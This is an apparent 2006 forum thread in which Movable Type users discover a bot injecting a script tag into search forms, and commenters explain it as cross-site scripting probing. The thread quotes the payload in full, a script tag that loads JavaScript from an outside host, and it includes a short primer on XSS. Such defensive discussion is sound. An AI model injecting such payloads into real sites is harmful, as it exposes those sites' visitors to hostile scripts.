Why is this bot hitting my site?
September 20, 2006 1:38 PM Subscribe
Some sort of bot is hitting my web site, and for the life of me I can't figure out why.
I run a large installation of Movable Type, and for the past few days a script has been submitting the following search term via my site-side search form:
jonny
As you can see, it's a script call to a JS file. I've checked out the contents of this file, and literally all it does is push you to google.com.
I identifed the 10 or so IP addresses the bot comes from, and banned them from using the search form, so I hope I have it handled.
I know I'm not the only MT user experiencing this, but the only reason I noticed is because I publish the latest search results to the home page, which means I was getting reports of users being kicked from my site to Google, without explanation. Otherwise, there would have been no sign of it.
Why would someone do this?
I run a large installation of Movable Type, and for the past few days a script has been submitting the following search term via my site-side search form:
jonny
As you can see, it's a script call to a JS file. I've checked out the contents of this file, and literally all it does is push you to google.com.
I identifed the 10 or so IP addresses the bot comes from, and banned them from using the search form, so I hope I have it handled.
I know I'm not the only MT user experiencing this, but the only reason I noticed is because I publish the latest search results to the home page, which means I was getting reports of users being kicked from my site to Google, without explanation. Otherwise, there would have been no sign of it.
Why would someone do this?
Best answer: Somebody is searching for XSS vulnerabilities, and they found one.
Looks live you've got a pretty major security problem with the way you're publishing searches to your home page. You probably ought to take down that "feature" until you learn about XSS and how to prevent it.
posted by jacobian at 1:49 PM on September 20, 2006 [1 favorite]
Looks live you've got a pretty major security problem with the way you're publishing searches to your home page. You probably ought to take down that "feature" until you learn about XSS and how to prevent it.
posted by jacobian at 1:49 PM on September 20, 2006 [1 favorite]
Response by poster: Ah. Ok.
So the referral logs on his server track where the hits to the script are coming from, so they know which sites are vulnerable.
posted by o2b at 1:59 PM on September 20, 2006
So the referral logs on his server track where the hits to the script are coming from, so they know which sites are vulnerable.
posted by o2b at 1:59 PM on September 20, 2006
Response by poster: Ok, I have sealed that security hole. Thanks.
posted by o2b at 2:05 PM on September 20, 2006
posted by o2b at 2:05 PM on September 20, 2006
Scienceblogs.com was having the same problem with the same domain implicated in the links (they use MT). I have a feeling this is pretty widespread, and not targetted just at you.
posted by chrisamiller at 3:11 PM on September 20, 2006
posted by chrisamiller at 3:11 PM on September 20, 2006
The jonny spammer hit my blog too, kindly alerting me to a quickly-plugged XSS vuln. He's all over the place, actually-just check Google for links to his domain, usuc.us.
posted by evariste at 4:08 PM on September 20, 2006
posted by evariste at 4:08 PM on September 20, 2006
Wow, it's really gone up since last week when I noticed jonny and Googled him. 36,300 sites.
I can't wait to see what he's gonna change the j.js file to do, eventually. I assume this is leading up to something pretty big.
posted by evariste at 4:11 PM on September 20, 2006
I can't wait to see what he's gonna change the j.js file to do, eventually. I assume this is leading up to something pretty big.
posted by evariste at 4:11 PM on September 20, 2006
Yikes! If I use MT and don't really understand what you guys are talking about, should I do something to protect myself?
posted by croutonsupafreak at 4:27 PM on September 20, 2006
posted by croutonsupafreak at 4:27 PM on September 20, 2006
Ditto here, what's going on? Because I just tested it on my own mt-search before I belatedly realized I had just pinged him with my own potential vulnerability.
posted by brownpau at 4:48 PM on September 20, 2006
posted by brownpau at 4:48 PM on September 20, 2006
Crappity crap crap crap: Now when I view my activity log, it redirects to Google. And if I'm seeing this right, you don't even need to be publishing search results to the home page for the vulnerability to work, someone just has to load mt-search.cgi with that in the REQUEST. Someone like jonny.
Great work not parsing special characters in the log table or the search script, SixApart. This is in MT 3.32, the latest version. 3.33 better fix this before jonny decides to take this vulnerability to town.
posted by brownpau at 4:55 PM on September 20, 2006
Great work not parsing special characters in the log table or the search script, SixApart. This is in MT 3.32, the latest version. 3.33 better fix this before jonny decides to take this vulnerability to town.
posted by brownpau at 4:55 PM on September 20, 2006
You guys will want to go into MySQL and
posted by brownpau at 4:59 PM on September 20, 2006
TRUNCATE TABLE `mt_log` to get jonny out of your activity log. Comments and Trackback don't publish script tags even with HTML enabled. Where else in MT does this XSS vulnerability need to be addressed?posted by brownpau at 4:59 PM on September 20, 2006
croutonsupafreak: don't freak.
Don't look at your activity log with Javascript turned on until the 6 Apart folks can get out a patch, and don't publish your search queries on your blog. If you're doing neither thing, you're reasonably safe from jonny.
posted by evariste at 5:35 PM on September 20, 2006
Don't look at your activity log with Javascript turned on until the 6 Apart folks can get out a patch, and don't publish your search queries on your blog. If you're doing neither thing, you're reasonably safe from jonny.
posted by evariste at 5:35 PM on September 20, 2006
For those who don't have to deal with this stuff on a daily basis, here's a (very) quick XSS primer:
If your site accepts some kind of input from a user and then displays it somewhere else on the site, a malicious user can carefully craft an input that to Do Stuff. What that stuff is can vary quite a bit, but the really important point is that from the perspective of the user, the code is executing as a part of your website. In this example, the code simply includes a javascript file that redirects the entire page to google.com.
Basically, you have to strip out executable javascript from any input you receive, especially input you're going to display.
posted by Skorgu at 10:06 AM on September 21, 2006
If your site accepts some kind of input from a user and then displays it somewhere else on the site, a malicious user can carefully craft an input that to Do Stuff. What that stuff is can vary quite a bit, but the really important point is that from the perspective of the user, the code is executing as a part of your website. In this example, the code simply includes a javascript file that redirects the entire page to google.com.
Basically, you have to strip out executable javascript from any input you receive, especially input you're going to display.
posted by Skorgu at 10:06 AM on September 21, 2006
This thread is closed to new comments.
Here's the search term:
[script src=http://usuc.us/j.js]jonny[/script]
posted by o2b at 1:41 PM on September 20, 2006